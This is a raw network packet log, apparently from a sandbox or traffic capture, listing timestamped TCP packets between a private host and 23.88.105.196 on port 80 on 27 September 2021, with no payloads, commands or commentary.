Sep 27, 2021 18:33:08.666239023 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666248083 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666263103 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666276932 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666281939 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666304111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666323900 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666328907 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666342974 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666354895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666373014 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666380882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666393995 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666407108 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666424990 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666431904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666448116 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666459084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666471004 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666487932 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666500092 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666529894 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666596889 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666623116 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666642904 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666651011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666672945 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666677952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666692019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666703939 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666714907 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666743994 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666748047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666774035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666790962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666810989 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666877031 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666903019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666922092 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666929007 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666954041 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666954041 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666965961 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.666984081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.666996002 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667010069 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667021990 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667036057 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667047977 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667059898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667073011 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667085886 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667098045 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667124987 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667126894 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667164087 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667171955 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667191982 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667201996 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667217970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667233944 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667243004 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667262077 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667268038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667288065 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667294025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667314053 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667319059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667336941 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667345047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667360067 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667370081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667380095 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667397976 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667408943 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667423964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667438984 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667448997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667465925 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667488098 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667512894 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667555094 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667586088 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667610884 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667628050 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667649031 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667727947 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667769909 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667803049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667848110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667860985 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667886019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667908907 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667911053 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667931080 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667938948 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.667960882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667984962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.667999029 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.668040991 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.769380093 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.790802002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.790827990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.790838957 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.790852070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.790868998 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.790884018 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.790998936 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791018009 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791070938 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791086912 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791104078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791141033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791162968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791277885 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.791300058 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.791304111 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.791306973 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.791332006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791352034 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791368961 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791384935 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791399956 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791415930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791430950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791496038 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791517019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791538954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791560888 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791631937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791656017 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791676998 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791697025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791718960 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791755915 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791781902 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791783094 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.791883945 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791920900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791944981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791969061 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.791970015 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.791991949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792059898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792082071 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792087078 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.792094946 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.792098045 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.792102098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792124987 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792138100 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.792185068 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792207956 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792233944 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792249918 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.792277098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792301893 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792371035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792386055 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.792490005 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.792573929 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792599916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792623043 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792646885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792651892 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.792668104 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792694092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792722940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792746067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792769909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792829990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792855024 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792881012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792905092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.792942047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793001890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793035984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793061018 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793085098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793108940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793132067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793155909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793231964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793256044 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793277979 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793299913 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793395996 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793421030 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793442965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793497086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793520927 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793554068 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793617964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793642044 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793674946 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793729067 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793791056 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793814898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793838978 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793863058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793958902 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.793984890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794008017 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794034004 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794056892 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794081926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794116974 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794151068 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794174910 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794189930 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.794205904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794245005 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794305086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794359922 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.794363022 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794420004 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.794439077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.794482946 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795170069 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.795188904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795219898 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795243025 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795268059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795295954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795320034 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795344114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795366049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795387983 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795409918 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795475006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795499086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795521975 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795548916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795573950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795598030 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.795654058 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795679092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795701981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795726061 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795756102 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795815945 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795839071 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.795855045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795867920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795876980 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.795886993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.795984983 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796009064 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796034098 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796058893 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796081066 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796113968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796169043 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796192884 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796251059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796307087 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796334028 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796411991 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796436071 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796459913 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796492100 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796516895 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796540022 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796546936 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.796602964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796607971 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.796626091 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796716928 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796767950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796792030 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796817064 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796936989 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796962976 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.796986103 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797046900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797071934 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797095060 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797117949 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797141075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797193050 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797280073 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797305107 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797327995 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797353983 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797410011 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.797483921 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797519922 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797571898 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.797599077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797755957 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.797768116 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.797775030 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797801971 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797837019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.797840118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797846079 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797863960 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797883034 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797905922 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797929049 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797951937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.797975063 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798038006 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798120975 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798155069 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798192024 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798214912 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798238039 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798274994 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798387051 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798412085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798491955 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798619986 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798648119 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798672915 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798696995 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798721075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798743963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798768997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798794031 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798876047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798901081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.798923969 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:08.799925089 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799954891 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799958944 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799962997 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799966097 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799968958 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799972057 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799976110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799978018 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:08.799981117 CEST	49741	80	192.168.2.6	23.88.105.196
